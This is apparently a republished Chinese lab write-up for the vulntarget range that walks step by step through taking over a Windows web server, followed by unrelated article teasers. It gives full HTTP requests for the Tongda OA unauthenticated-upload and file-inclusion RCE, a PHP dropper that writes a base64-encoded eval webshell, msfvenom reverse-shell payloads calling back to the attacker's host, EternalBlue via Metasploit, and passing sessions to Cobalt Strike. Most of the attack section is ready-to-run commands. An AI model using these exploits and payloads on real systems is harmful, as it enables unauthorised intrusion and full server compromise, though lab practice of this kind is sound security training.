Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)

news2024/12/23 9:36:29

Web安全:拿到 Web 服务器 最高权限.

Web 服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载.


目录:

Web安全:拿到 Web 服务器 最高权限.

免责声明:

网络环境所示:

主机信息:

拿到 Web 服务器 最高权限 测试:

第一步:信息收集.

第二步:漏洞探测.

第三步:漏洞利用.

使用通达 OA 未授权上传 + 文件包含RCE 测试.

使用 MS17-010 进行测试:

转移会话(msf 的会话传递到 cs 中.)


免责声明:

严禁利用本文章中所提到的虚拟机和技术进行任何形式的攻击,否则后果自负,上传者不承担任何责任。


网络环境所示:


主机信息:

主机

外网

内网1内网2
kali192.168.0.101
win 7192.168.0.10210.0.20.98
win 201610.0.20.9910.0.10.111
win 201910.0.10.110

拿到 Web 服务器 最高权限 测试:

第一步:信息收集.

使用 nmap 工具对服务器进行端口信息收集.

nmap -A -sV 192.168.0.102


第二步:漏洞探测.

通达 OA 漏洞探测:(可以使用网上进行搜索.)

(1)http[s]:// 服务器 IP 地址/inc/expired.php
(2)http[s]:// 服务器 IP 地址/inc/reg_trial.php


在上面 nmap 工具扫描中发现 445 端口也是开放的.(所以可以试试使用 MS17-010 进行测试.)


第三步:漏洞利用.

使用通达 OA 未授权上传 + 文件包含RCE 测试.

未授权上传 测试.

构造http请求包,获取图片马地址:
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.0.102
Content-Length: 635
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$fn = fopen("bgxg.php","w+");
$st=base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydiZ3hnJ10pO3BocGluZm8oKTs/Pg==");
$result = fwrite($fn,$st);
fclose($fn);
?>

------WebKitFormBoundarypyfBh1YB4pV8McGB--

Base64 编码的过程:

https://c.runoob.com/front-end/693/

使用 文件包含 ,把图片中的代码执行,生成出一个新的 php 木马文件.
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.0.102
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2306/589610612.jpg"}&cmd=whoami

访问使用了 包含漏洞 有没有生成出,新的木马文件出来.

木马文件的地址在文件包含目录中(/ispirit/interface/木马文件名)(bgxg.php)

使用 蚁剑 进行连接.

生成一个程序(木马),使用 蚁剑 上传.(然后在 MSF 上线.)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.101 lport=4444 -f exe >bgxg.exe

(1)msfconsole        //打开 msf 命令

(2)use exploit/multi/handler        //加载模块 命令

(3)set payload windows/meterpreter/reverse_tcp        //设置 payload 命令

(4)set lhost 192.168.0.101                //设置本地监听 IP(就是 kali 的 IP)命令

(5)set LPORT 4444                    //设置本地监听端口(就是 kali 的 端口)命令

(6)run                //执行 命令


使用 MS17-010 进行测试:

(1)msfconsole        //打开 msf 命令

(2)use exploit/windows/smb/ms17_010_eternalblue           //加载模块 命令

(3)show options            //查看模块信息

(5)set rhosts  192.168.0.102            //设置 服务器 IP 地址.(win7)

(7)run                //执行 命令


转移会话(msf 的会话传递到 cs 中.)

服务端:

(1)cd cs4.7        //切换为 cs 目录

(2)./teamserver 192.168.0.101 888888      //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.

客户端:
 
(1)cd cs4.7        // 切换为 cs 目录

(2)./start.sh        // 打开 客户端.

这里我重新生成一个程序(木马):

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.101 LPORT=8888 -f exe > bgxg.exe
(1)msfconsole            // 打开 msf 工具.

(2)use exploit/multi/handler            // 设置 模块 

(3)set payload windows/meterpreter/reverse_tcp        //设置 payload 

(4)set lhost 192.168.0.101             // 和程序(木马)一样的 IP 地址

(5)set lport 8888                      // 和程序(木马)一样的 端口 号.

(6)exploit                             // 进行 测试.

想方法 把程序(木马) 上传到 服务器(目标)上去.(这里上面有 蚁剑 可以直接上传,也可利用 MS17-010 漏洞上传.)

把 msf 的会话传递到 cs 中.
(1)background                // 挂起 会话.

(2)use exploit/windows/local/payload_inject

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.

(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])

(6)set DisablePayloadHandler True

(7)set PrependMigrate True

(8)sessions -l  //查看 会话 是多少则设置多少

(9)set session 1 [一般是 1(上面查看的结果)]

(10)exploit      // 进行 测试.

返回 CS 客户端:看见已经成功.

 

       

     

       

参考文章:CobaltStrike(CS)与MetasploitFramework(MSF)联动_Luckysec的博客-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/601512.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

软考A计划-网络规划设计师-学习笔记-下

点击跳转专栏>Unity3D特效百例点击跳转专栏>案例项目实战源码点击跳转专栏>游戏脚本-辅助自动化点击跳转专栏>Android控件全解手册点击跳转专栏>Scratch编程案例 &#x1f449;关于作者 专注于Android/Unity和各种游戏开发技巧&#xff0c;以及各种资源分享&am…

从零开始Vue3+Element Plus后台管理系统(18)——权限路由实现

一开始打算做两种模式的路由权限&#xff0c;最后还是分成了3种&#xff0c;分别是&#xff1a; 前端固定路由&#xff0c;所有路由是固定的&#xff0c;通过权限过滤菜单和显示前端动态路由&#xff0c;通过权限过滤路由表和菜单后端动态路由&#xff0c;获取接口返回数据&am…

什么工程项目管理软件好用?

工程项目比较多&#xff0c;经常忘记项目的进度&#xff0c;想要可以查看项目进展的项目管理软件&#xff1f; 大多数时候&#xff0c;面对项目进度没有头绪&#xff0c;看不懂&#xff0c;无法把握&#xff1b;根本原因不在于题主所说的&#xff0c;是否缺少一张合适的项目进…

你必须知道的常用的足够简练的Python代码

许多程序员喜欢Python&#xff0c;因为它的语法简单简洁。下面提供的这些 Python 代码足够简练&#xff0c;可用于解决常见问题。 1.提取字典的键值对 dict1 {A:33, B:43, C:88, D:56} # 提取字典中值大于50的键值对 dict2 { key:value for key, value in dict1.items() if …

curl 命令-接口测试

curl 命令-接口测试 JUST DO IT 温暖春日 在linux/Unix 为代表的os上, 对后端进行测试, 模拟连接请求都会书写脚本 场景: 在Linux 上接口测试工具有ab, restClient, postman等, 最常用的方法是curl进行简单测试 curl是非常方便的Rest 客户端, 可以很方便的完成 Rest API测…

Hadoop教程第一章之Hadoop简介

1. Hadoop是什么 Hadoop是一个由Apache基金会所开发的分布式系统基础架构。主要解决&#xff0c;海量数据的存储和海量数据的分析计算问题。广义上来说&#xff0c;Hadoop通常是指一个更广泛的概念——Hadoop生态圈。 2. Hadoop的三大发行版本 Apache版本最原始&#xff08…

Python读取SD卡二进制数据

在我们使用 STM32 或者 FPGA 采集数据的时候&#xff0c;需要将数据存储到SD卡中&#xff0c;因为数据是按照地址存储的&#xff0c;并且没有文件结构&#xff0c;所以不能直接用电脑的文件管理器读取&#xff0c;下面是一种读取数据的办法 实验平台 正点原子STM32F407ZG探索…

现代化智能十防一体化智慧档案馆平台所具备的必要功能

现代化智能档案室的建设以物联网技术为支撑&#xff0c;包括智能密集架、恒温恒湿消毒净化设备、温湿度传感器、空气质量传感器、空气净化消毒设备、红外防盗设备、门禁设备、防火设备、漏水设备、预警设备、视频监控设备等&#xff0c;集中为一体的管理平台为智能档案室集成平…

金融行业机房监控4大难题?你中招了吗

信息化时代的今天&#xff0c;信息成为我们生活和工作中不可缺少的一部分&#xff0c;由金融行业系统承担&#xff0c;每天有大量的数据交换。 因此&#xff0c;近年来&#xff0c;银行系统对其机房的要求也越来越严格&#xff0c;同时也越来越向智能化、集约化方向发展。 金融…

opencv c++小笔记本(三)

opencv 一图像通道的分离和合并二.图像色彩改变三.简单形状识别1.灰度处理2.高斯滤波3.边缘检测4.膨胀 三.像素点统计四.多边形的绘制和填充五.鼠标操作与响应&#xff08;截图&#xff09;六.图像的像素转换和归一化七.视频文件摄像头使用八.视频的处理与保存九.图像直方图十.…

ESP32-C2开发板 Homekit程序示例

准备 1.1硬件ESP32 C2开发板&#xff0c;如图1-1所示 图1-1 ESP32 C2开发板 1.2软件 CozyLife APP可以在各大应用市场搜索下载&#xff0c;也可以扫描二维码下载如图1-2所示 HomeKit flash download tool 烧录工具 esp32c2 homkit演示固件 烧录教程 打开flash_download_to…

实用工具篇(一):JApiDocs

JApiDocs是一个无需额外注解、开箱即用的SpringBoot接口文档生成工具。 编写和维护API文档这个事情&#xff0c;对于后端程序员来说&#xff0c;是一件恼人但又不得不做的事情&#xff0c;我们都不喜欢写文档&#xff0c;但除非项目前后端代码都是自己写的&#xff0c;否则API…

redis哨兵模式原理

概述 为了实现redis集群的高可用&#xff0c;redis经历了好几次迭代&#xff0c;从最开始的主从模式&#xff0c;到哨兵模式&#xff0c;再到现在的集群模式&#xff0c;可以说架构的优化越来越好&#xff0c;那本篇文章就介绍一下redis的哨兵模式&#xff0c;不过我司其实使用…

阿里云服务器部署flask简单方法

记录如何在阿里云服务器上部署flask接口并实现公网访问。 文章目录 1. 简介2. 部署python3环境3. 生成requirement.txt4. 将项目打包上传5. 安装依赖库6. 查看防火墙7. 测试能否公网访问 1. 简介 因落地通话callback服务测试&#xff0c;需要我写一个测试demo&#xff0c;用于…

Unity Shader中使用GLSL创建材质

目录 Unity Shader格式Properties怎么在脚本中使用类似于glUniform()的功能呢&#xff1f; SubShaderTagsLODpasspass内的tags说明pass内的代码段&#xff08;GLSL&#xff09;GLSL与CG语言的差异1. GLSL不可在外部定义结构体2. 在UnityShader中Uniform可以写在vert frag外面 S…

如何处理图片排重(精准排重,相似排重)

图片相似度对比 1、需求 假如有一个图片池&#xff0c;存有1亿图片。给一张目标图片&#xff0c;在图片池中做匹配。 判断一张图片是否在图片池中出现过。&#xff08;完全一样&#xff09;判断有没有相似的出现过。比如两张图相似度90&#xff0c;两张图片是在描述一件事情。 …

请推荐几个github上的vue的pc端项目?

前言 这是github上一些高收藏的vue PC端的项目&#xff0c;花了一点时间做了一下vue2和vue3的资源分类整理&#xff0c;可以根据自己的学习进度以及需求来选择对应的项目来研究&#xff0c;希望对你有帮助~ Vue2 PC项目 1、 Elemen Star&#xff1a;53.4k 是一个基于Vue.js…

【Unity Optimize】使用图集(Sprite Atlas)优化项目

目录 1 图集&#xff08;Sprite Atlas&#xff09;介绍2 创建与配置Sprite Atlas2.1 创建Sprite Atlas2.1.1 Unity2D项目2.1.2 Unity3D项目 2.2 配置Sprite Atlas2.3 注意事项 3 Sprite Atlas的接口4 Sprite Atlas的优化建议 1 图集&#xff08;Sprite Atlas&#xff09;介绍 …

vue3+element plus+vite 引入本地静态资源图片require报错的原因和解决方案,以及如何在表格中展示图片

文章目录 一、vue3element plusvite 引入本地静态资源图片require报错的原因和解决方案二、vue 3element plusvite 项目中&#xff0c;在el-table中展示本地静态图片总结 一、vue3element plusvite 引入本地静态资源图片require报错的原因和解决方案 在写vue3vite项目的过程中…

Java-代码连接数据库生成POJO、Mapper

本文主要介绍如何在IDEA中&#xff0c;编写代码连接数据库生成对应的POJO、Mapper、Service、Controller 文章目录 前言环境搭建代码开发基本配置常量信息代码生成 测试结果 前言 在实际开发中&#xff0c;设计完数据库后&#xff0c;不可避免需要创建数据库表对应的POJO&…